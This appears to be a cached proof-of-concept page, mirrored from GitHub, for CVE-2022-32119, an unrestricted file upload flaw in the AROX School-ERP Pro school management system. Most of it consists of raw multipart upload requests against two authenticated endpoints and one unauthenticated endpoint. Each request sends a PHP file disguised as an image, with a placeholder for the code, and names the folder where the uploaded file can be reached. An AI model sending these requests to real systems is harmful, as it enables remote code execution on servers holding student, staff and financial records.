Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-32119 PoC — AROX School-ERP Pro 代码问题漏洞

Source
https://github.com/JC175/CVE-2022-32119
Associated Vulnerability
Title:AROX School-ERP Pro 代码问题漏洞 (CVE-2022-32119)
Description:AROX School-ERP Pro是一套基于Web的学校管理系统。该系统包括课程管理、考勤管理、财务管理、人力资源管理和考试管理等功能。 AROX School-ERP Pro v1.0 版本存在安全漏洞,攻击者利用该漏洞可导致任意文件上传。
Description
CVE-2022-32119 - Arox-Unrestricted-File-Upload
Readme
# CVE-2022-32119 - Arox-Unrestricted-File-Upload

There are multiple unrestricted file uploads that result in the arbitrary execution of PHP code.

## Authenticated Vulnerable Pages:


#### localhost/office_admin/?pid=54&action=add

```

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="apid"



2

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="title"



Test

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="image_path"; filename="phpfilehere.php.jpg"

Content-Type: image/jpeg



<PHP Code Here>

-----------------------------181967832439954202373233921976

Content-Disposition: form-data; name="addphoto"



Add

-----------------------------181967832439954202373233921976--

  
File location: localhost/office_admin/images/student_photos/<file here>

```


  
#### localhost/office_admin/?pid=22&action=school_details

```

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_startdate"



06/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_enddate"



07/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_ac_startdate"



06/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_ac_enddate"



07/04/2022

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_schoolname"



Test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_currency"



Test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_symbol"



test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_address"



Test

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_endclass"





-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_email"



info@test.com

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_phoneno"



1234567899

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_website"



www.test.com

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="fi_school_logo"; filename="phpfilehere.php"

Content-Type: image/jpeg



<PHP Code Here>

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="oldlogoimage"



oldimage.jpg

-----------------------------11158482814295139764067111151

Content-Disposition: form-data; name="Submit"



Submit

-----------------------------11158482814295139764067111151--


File location: localhost/office_admin/images/school_logo/<file here>

```


## Unauthenticated Vulnerable Pages:

#### localhost/greatbritain/greatbritain/upload_stafffille.php

```

-----------------------------80149291128776956634294289925

Content-Disposition: form-data; name="txtdocname"; filename="test.jpg"

Content-Type: image/jpeg



123456

-----------------------------80149291128776956634294289925

Content-Disposition: form-data; name="btnsubmit"



Submit

-----------------------------80149291128776956634294289925--


File location: localhost/greatbritain/greatbritain/upload_data/<file here>

```
File Snapshot

 [4.0K]  /data/pocs/b424466a78d9b8b4646c0f4bac856716740d4765
└── [3.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.